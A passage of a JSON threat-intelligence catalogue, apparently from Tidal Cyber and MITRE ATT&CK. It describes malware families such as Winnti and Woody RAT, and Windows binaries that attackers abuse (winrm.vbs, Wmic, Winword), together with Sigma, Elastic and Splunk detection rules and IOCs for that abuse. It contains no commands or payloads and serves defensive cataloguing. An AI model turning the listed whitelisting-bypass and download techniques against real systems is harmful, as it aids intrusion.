[APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66). [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [], + "software_attack_id": "S0219", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "49abab73-3c5c-476e-afd5-69b5c732d845", + "type": "similar" + } + ], + "uuid": "5f994df7-55b0-4383-8ebc-506d4987292a", + "value": "WINERACK" + }, + { + "description": "[Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is a lightweight, open source tool similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) designed to allow system administrators to execute commands on remote servers. [[Winexe Github Sept 2013](https://app.tidalcyber.com/references/7003e2d4-83e5-4672-aaa9-53cc4bcb08b5)] [Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is unique in that it is a GNU/Linux based client. [[Überwachung APT28 Forfiles June 2015](https://app.tidalcyber.com/references/3b85fff0-88d8-4df6-af0b-66e57492732e)]", + "meta": { + "platforms": [], + "software_attack_id": "S0191", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "d428f9be-6faf-4d57-b677-4a927fea5f7e", + "type": "used-by" + }, + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "used-by" + }, + { + "dest-uuid": "96fd6cc4-a693-4118-83ec-619e5352d07d", + "type": "similar" + } + ], + "uuid": "65d5b524-0e84-417d-9884-e2c501abfacd", + "value": "Winexe" + }, + { + "description": "[Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37) is a backdoor that appears to be a version of commercial software [FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) in a May 2016 campaign. [[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)] [[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0176", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3a660ef3-9954-4252-8946-f903f3f42d0c", + "type": "used-by" + }, + { + "dest-uuid": "a8d3d497-2da9-4797-8e0b-ed176be08654", + "type": "similar" + } + ], + "uuid": "3e70078f-407e-4b03-b604-bdc05b372f37", + "value": "Wingbird" + }, + { + "description": "[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]", + "meta": { + "id": "7be8168a-91f9-4ee1-9d12-bc3952fa1d47", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6c4e7a00-0151-490c-8a41-98981d355725", + "type": "similar" + } + ], + "uuid": "d042aa21-d8f6-4cdc-bdd8-b304cbf5b71f", + "value": "winget.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Package Manager tool\n\n**Author:** Paul Sanders\n\n**Paths:**\n* C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe\n\n**Resources:**\n* [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html)\n* [https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended](https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended)\n\n**Detection:**\n* IOC: winget.exe spawned with local manifest file\n* IOC: Sysmon Event ID 1 - Process Creation\n* Analysis: [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html)\n* Sigma: [proc_creation_win_winget_local_install_via_manifest.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml)[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5174", + "source": "Tidal Cyber", + "tags": [ + "61f778ca-b2f1-4877-b0f5-fd5e87b6ddab", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d042aa21-d8f6-4cdc-bdd8-b304cbf5b71f", + "type": "similar" + } + ], + "uuid": "6c4e7a00-0151-490c-8a41-98981d355725", + "value": "winget" + }, + { + "description": "[WinMM](https://app.tidalcyber.com/software/e10423c2-71a7-4878-96ba-343191136c19) is a full-featured, simple backdoor used by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d). [[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0059", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "22addc7b-b39f-483d-979a-1b35147da5de", + "type": "similar" + } + ], + "uuid": "e10423c2-71a7-4878-96ba-343191136c19", + "value": "WinMM" + }, + { + "description": "[Winnti for Linux](https://app.tidalcyber.com/software/e384e711-0796-4cbc-8854-8c3f939faf57) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b). The Windows variant is tracked separately under [Winnti for Windows](https://app.tidalcyber.com/software/245c216e-41c3-4dec-8b23-bfc7c6a46d6e).[[Chronicle Winnti for Linux May 2019](https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0430", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "8787e86d-8475-4f13-acea-d33eb83b6105", + "type": "similar" + } + ], + "uuid": "e384e711-0796-4cbc-8854-8c3f939faf57", + "value": "Winnti for Linux" + }, + { + "description": "[Winnti for Windows](https://app.tidalcyber.com/software/245c216e-41c3-4dec-8b23-bfc7c6a46d6e) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)][[Microsoft Winnti Jan 2017](https://app.tidalcyber.com/references/6b63fac9-4bde-4fc8-a016-e77c8485fab7)][[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)][[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]. The Linux variant is tracked separately under [Winnti for Linux](https://app.tidalcyber.com/software/e384e711-0796-4cbc-8854-8c3f939faf57).[[Chronicle Winnti for Linux May 2019](https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0141", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6932662a-53a7-4e43-877f-6e940e2d744b", + "type": "used-by" + }, + { + "dest-uuid": "d3afa961-a80c-4043-9509-282cdf69ab21", + "type": "similar" + } + ], + "uuid": "245c216e-41c3-4dec-8b23-bfc7c6a46d6e", + "value": "Winnti for Windows" + }, + { + "description": "According to its website, WinRAR is a \"data compression, encryption and archiving tool for Windows\", which is designed to process RAR and ZIP files.[[WinRAR Website](/references/ad620d61-108c-4bb0-a897-02764ea9a903)] It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5081", + "source": "Tidal Cyber", + "tags": [ + "23d0545e-45fa-4f0a-957e-deb923039c80" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "d9792748-b81a-4d82-a45e-de05c2a23dbf", + "value": "WinRAR" + }, + { + "description": "[[winrm.vbs - LOLBAS Project](/references/86107810-8a1d-4c13-80f0-c1624143d057)]", + "meta": { + "id": "2e345a9b-d508-4166-80a2-860287434dc6", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8807e10c-dc1b-4dab-8f60-c03a85c18873", + "type": "similar" + } + ], + "uuid": "65478a44-ca42-48cc-a03e-cd67353fc39f", + "value": "winrm.vbs" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script used for manage Windows RM settings\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\winrm.vbs\n* C:\\Windows\\SysWOW64\\winrm.vbs\n\n**Resources:**\n* [https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology](https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology)\n* [https://www.youtube.com/watch?v=3gz1QmiMhss](https://www.youtube.com/watch?v=3gz1QmiMhss)\n* [https://github.com/enigma0x3/windows-operating-system-archaeology](https://github.com/enigma0x3/windows-operating-system-archaeology)\n* [https://redcanary.com/blog/lateral-movement-winrm-wmi/](https://redcanary.com/blog/lateral-movement-winrm-wmi/)\n* [https://twitter.com/bohops/status/994405551751815170](https://twitter.com/bohops/status/994405551751815170)\n* [https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404](https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404)\n* [https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf)\n\n**Detection:**\n* Sigma: [proc_creation_win_winrm_awl_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml)\n* Sigma: [proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml)\n* Sigma: [file_event_win_winrm_awl_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[winrm.vbs - LOLBAS Project](/references/86107810-8a1d-4c13-80f0-c1624143d057)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5263", + "source": "Tidal Cyber", + "tags": [ + "2eecd309-e75d-4f7b-8f6f-e11213f48b12", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "65478a44-ca42-48cc-a03e-cd67353fc39f", + "type": "similar" + } + ], + "uuid": "8807e10c-dc1b-4dab-8f60-c03a85c18873", + "value": "winrm" + }, + { + "description": "WinSCP is a tool used to facilitate file transfer using Secure Shell (SSH) File Transfer Protocol (FTP) for Microsoft Windows.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5046", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "3ded75ea-b253-48cd-94e7-aef53e0d1e31", + "value": "WinSCP" + }, + { + "description": "[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]", + "meta": { + "id": "1c74cced-8dc0-4c39-8377-7afc77ae45d3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7adaeb79-087f-4d65-8f8f-d4689755b107", + "type": "similar" + } + ], + "uuid": "5f6ec10f-8c3d-4656-89bc-f349fe8e5149", + "value": "Winword.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\winword.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_office_arbitrary_cli_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5250", + "source": "Tidal Cyber", + "tags": [ + "228354f0-c709-4a16-a489-c5098ae06c17", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "5f6ec10f-8c3d-4656-89bc-f349fe8e5149", + "type": "similar" + } + ], + "uuid": "7adaeb79-087f-4d65-8f8f-d4689755b107", + "value": "Winword" + }, + { + "description": "[Wiper](https://app.tidalcyber.com/software/627e05c2-c02e-433e-9288-c2d78bce156f) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [[Dell Wiper](https://app.tidalcyber.com/references/be6629ef-e7c6-411c-9bd2-34e59062cadd)]", + "meta": { + "platforms": [], + "software_attack_id": "S0041", + "source": "MITRE", + "tags": [ + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a19c49aa-36fe-4c05-b817-23e1c7a7d085", + "type": "similar" + } + ], + "uuid": "627e05c2-c02e-433e-9288-c2d78bce156f", + "value": "Wiper" + }, + { + "description": "Wireshark is a popular open-source packet analyzer utility.", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5269", + "source": "Tidal Cyber", + "tags": [ + "dbe18a6a-c8f9-451e-837e-5a7f25dcf913", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [], + "uuid": "804da3b9-9c3a-4937-aa4a-efddfa5c176e", + "value": "Wireshark" + }, + { + "description": "[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]", + "meta": { + "id": "0ca4e814-9eac-4d3e-bc73-4276ec713d6b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f3eb99a8-b7b5-4e90-8e99-3f38309402c0", + "type": "similar" + } + ], + "uuid": "bb8be8ef-1d72-4e76-a111-4ddd0c4aa9d6", + "value": "Wlrmdr.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Logon Reminder executable\n\n**Author:** Moshe Kaplan\n\n**Paths:**\n* c:\\windows\\system32\\wlrmdr.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1493963591745220608](https://twitter.com/0gtweet/status/1493963591745220608)\n* [https://twitter.com/Oddvarmoe/status/927437787242090496](https://twitter.com/Oddvarmoe/status/927437787242090496)\n* [https://twitter.com/falsneg/status/1461625526640992260](https://twitter.com/falsneg/status/1461625526640992260)\n* [https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw](https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_wlrmdr.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml)\n* IOC: wlrmdr.exe spawning any new processes[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5175", + "source": "Tidal Cyber", + "tags": [ + "ebf92004-6e43-434c-8380-3671cf3640a2", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "bb8be8ef-1d72-4e76-a111-4ddd0c4aa9d6", + "type": "similar" + } + ], + "uuid": "f3eb99a8-b7b5-4e90-8e99-3f38309402c0", + "value": "Wlrmdr" + }, + { + "description": "[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]", + "meta": { + "id": "56e04589-f5f9-4724-9f87-ab7dd241d5f7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "24f3b066-a533-4b6c-a590-313a67154ba0", + "type": "similar" + } + ], + "uuid": "e7d40056-45fd-4e73-a7f4-750253b18d30", + "value": "Wmic.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The WMI command-line (WMIC) utility provides a command-line interface for WMI\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wbem\\wmic.exe\n* C:\\Windows\\SysWOW64\\wbem\\wmic.exe\n\n**Resources:**\n* [https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory](https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory)\n* [https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html](https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html)\n* [https://twitter.com/subTee/status/986234811944648707](https://twitter.com/subTee/status/986234811944648707)\n\n**Detection:**\n* Sigma: [image_load_wmic_remote_xsl_scripting_dlls.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml)\n* Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml)\n* Sigma: [proc_creation_win_wmic_squiblytwo_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml)\n* Sigma: [proc_creation_win_wmic_eventconsumer_creation.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml)\n* Elastic: [defense_evasion_suspicious_wmi_script.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml)\n* Elastic: [persistence_via_windows_management_instrumentation_event_subscription.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [xsl_script_execution_with_wmic.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml)\n* Splunk: [remote_wmi_command_attempt.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml)\n* Splunk: [remote_process_instantiation_via_wmi.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml)\n* Splunk: [process_execution_via_wmi.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Wmic retrieving scripts from remote system/Internet location\n* IOC: DotNet CLR libraries loaded into wmic.exe\n* IOC: DotNet CLR Usage Log - wmic.exe.log[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5176", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "9988b5fd-6235-4a8e-bb8e-d9124ead11d4", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "e7d40056-45fd-4e73-a7f4-750253b18d30", + "type": "similar" + } + ], + "uuid": "24f3b066-a533-4b6c-a590-313a67154ba0", + "value": "Wmic" + }, + { + "description": " [Woody RAT](https://app.tidalcyber.com/software/1f374a54-c839-5139-b755-555c66a21c12) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.[[MalwareBytes WoodyRAT Aug 2022](https://app.tidalcyber.com/references/5c2ecb15-14e9-5bd3-be5f-628fa4e98ee6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1065", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3bc7e862-5610-4c02-9c48-15b2e2dc1ddb", + "type": "similar" + } + ], + "uuid": "1f374a54-c839-5139-b755-555c66a21c12", + "value": "Woody RAT" + }, + { + "description": "[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]", + "meta": { + "id": "1d09058a-5903-49e8-ba83-ed7825c0fdc3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7720f60a-5c03-4241-b635-6313eceb3307", + "type": "similar" + } + ], + "uuid": "29f24b94-b871-4306-b75b-0a4b01860d0c", + "value": "WorkFolders.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Work Folders\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\WorkFolders.exe\n\n**Resources:**\n* [https://www.ctus.io/2021/04/12/exploading/](https://www.ctus.io/2021/04/12/exploading/)\n* [https://twitter.com/ElliotKillick/status/1449812843772227588](https://twitter.com/ElliotKillick/status/1449812843772227588)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_workfolders.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml)\n* IOC: WorkFolders.exe should not be run on a normal workstation[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5177", + "source": "Tidal Cyber", + "tags": [ + "b5581207-a45f-4f7f-b637-14444d716ad1", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": 